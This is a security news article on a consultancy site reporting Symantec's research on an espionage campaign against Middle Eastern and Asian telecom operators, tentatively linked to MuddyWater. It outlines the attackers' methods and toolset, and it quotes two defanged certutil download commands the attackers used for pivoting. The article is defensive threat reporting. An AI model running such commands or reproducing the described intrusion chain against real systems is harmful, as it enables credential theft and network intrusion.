Privacy Ninja



        • Secure your network against various threat points. VA starts at only S$1,000, while VAPT starts at S$4,000. With Price Beat Guarantee!

        • API Penetration Testing
        • Enhance your digital security posture with our approach that identifies and addresses vulnerabilities within your API framework, ensuring robust protection against cyber threats targeting your digital interfaces.

        • On-Prem & Cloud Network Penetration Testing
        • Boost your network’s resilience with our assessment that uncovers security gaps, so you can strengthen your defences against sophisticated cyber threats targeting your network

        • Web Penetration Testing
        • Fortify your web presence with our specialised web app penetration testing service, designed to uncover and address vulnerabilities, ensuring your website stands resilient against online threats

        • Mobile Penetration Testing
        • Strengthen your mobile ecosystem’s resilience with our in-depth penetration testing service. From applications to underlying systems, we meticulously probe for vulnerabilities

        • Cyber Hygiene Training
        • Empower your team with essential cybersecurity knowledge, covering the latest vulnerabilities, best practices, and proactive defence strategies

        • Thick Client Penetration Testing
        • Elevate your application’s security with our thorough thick client penetration testing service. From standalone desktop applications to complex client-server systems, we meticulously probe for vulnerabilities to fortify your software against potential cyber threats.

        • Source Code Review
        • Ensure the integrity and security of your codebase with our comprehensive service, meticulously analysing code quality, identifying vulnerabilities, and optimising performance for various types of applications, scripts, plugins, and more

        • Email Spoofing Prevention
        • Check if your organisation’s email is vulnerable to hackers and put a stop to it. Receive your free test today!

        • Email Phishing Excercise
        • Strengthen your defense against email threats via simulated attacks that test and educate your team on spotting malicious emails, reducing breach risks and boosting security.

        • Cyber Essentials Bundle
        • Equip your organisation with essential cyber protection through our packages, featuring quarterly breached accounts monitoring, email phishing campaigns, cyber hygiene training, and more. LAUNCHING SOON.

Telecom Operators Targeted in Recent Espionage Hacking Campaign

Telecom Operators Targeted in Recent Espionage Hacking Campaign

Researchers have spotted a new espionage hacking campaign targeting telecommunication and IT service providers in the Middle East and Asia.

The campaign has been conducted over the past six months, and there are tentative links to the Iranian-backed actor, MERCURY (aka MuddyWaterSeedWorm, or TEMP.Zagros).

The report comes from the Threat Hunter Team at Symantec, who has collected evidence and toolset samples from recent attacks in Israel, Jordan, Kuwait, Saudi Arabia, the United Arab Emirates, Pakistan, Thailand, and Laos.

Also Read: IT Governance Framework PDF Best Practices And Guidelines

Targeting Exchange servers

The attackers appear to be most interested in vulnerable Exchange Servers, which they use for web shell deployment.

After the initial breach, they steal account credentials and move laterally in the corporate network. In some cases, they use their foothold to pivot to other connected organizations.

Although the infection vector is unknown, Symantec was able to find a case of a ZIP file named “Special discount,” which contained an installer for a remote desktop software application.

As such, the threat actors may be distributing spear-phishing emails to specific targets.

Tools and methods

The first sign of compromise by the threat actors is typically the creation of a Windows service to launch a Windows Script File (WSF) that performs reconnaissance on the network.

Next, PowerShell is used to download more WSFs, and Certutil is used to download tunneling tools and run WMI queries.

“Based on process lineage data, attackers seemed to use scripts extensively. These may be automated scripts used for collecting information and downloading additional tools,” explains Symantec’s report.

“However, in one instance, a command asks cURL for help, suggesting that there may have been at least some hands-on-keyboard activity on the part of the attackers.”

Having established their presence on the target organization, the actors use the eHorus remote access tool, which enables them to do the following:

  1. Deliver and run a (suspected) Local Security Authority Subsystem Service (LSASS) dumping tool.
  2. Deliver (what are believed to be) Ligolo tunneling tools.
  3. Execute Certutil to request a URL from Exchange Web Services (EWS) of (what appears to be) other targeted organizations.

To pivot to other telcos, the actors look for potential Exchange Web Services links and use the following commands for this purpose:

certutil.exe -urlcache –split [DASH]f hxxps://[REDACTED]/ews/exchange[.]asmx
certutil.exe -urlcache -split [DASH]f hxxps://webmail.[REDACTED][.]com/ews

The full list with the toolset used by the particular actor is given below:

  • ScreenConnect: Legitimate remote administration tool
  • RemoteUtilities: Legitimate remote administration tool
  • eHorus: Legitimate remote administration tool
  • Ligolo: Reverse tunneling tool
  • Hidec: Command line tool for running a hidden window
  • Nping: Packet generation tool
  • LSASS Dumper: Tool that dumps credentials from Local Security Authority Subsystem Service (LSASS) process
  • SharpChisel: Tunneling tool
  • Password Dumper
  • CrackMapExec: Publicly available tool that is used to automate security assessment of an Active Directory environment
  • ProcDump: Microsoft Sysinternals tool for monitoring an application for CPU spikes and generating crash dumps, but which can also be used as a general process dump utility
  • SOCKS5 proxy server: Tunneling tool
  • Keylogger: Retrieves browser credentials
  • Mimikatz: Publicly available credential dumping tool

Most of these tools are publicly available tools commonly used by offensive security teams, so they may not trigger alarms in organizations.

Also Read: Steps On How To Create Complain About Telemarketing Calls

Links to MuddyWater

Even though the attribution isn’t definitive, Symantec logged two IP addresses that overlap with infrastructure used in older MuddyWater attacks.

Moreover, the toolset features several similarities to March 2021 attacks reported by Trend Micro researchers.

Still, many Iranian state-supported actors use off-the-shelf tools and regularly switch infrastructure, and as such, no conclusive attribution can be made at this time.



Subscribe to our mailing list to get free tips on Data Protection and Data Privacy updates weekly!

Personal Data Protection


We have assisted numerous companies to prepare proper and accurate reports to PDPC to minimise financial penalties.


Click one of our contacts below to chat on WhatsApp

× Chat with us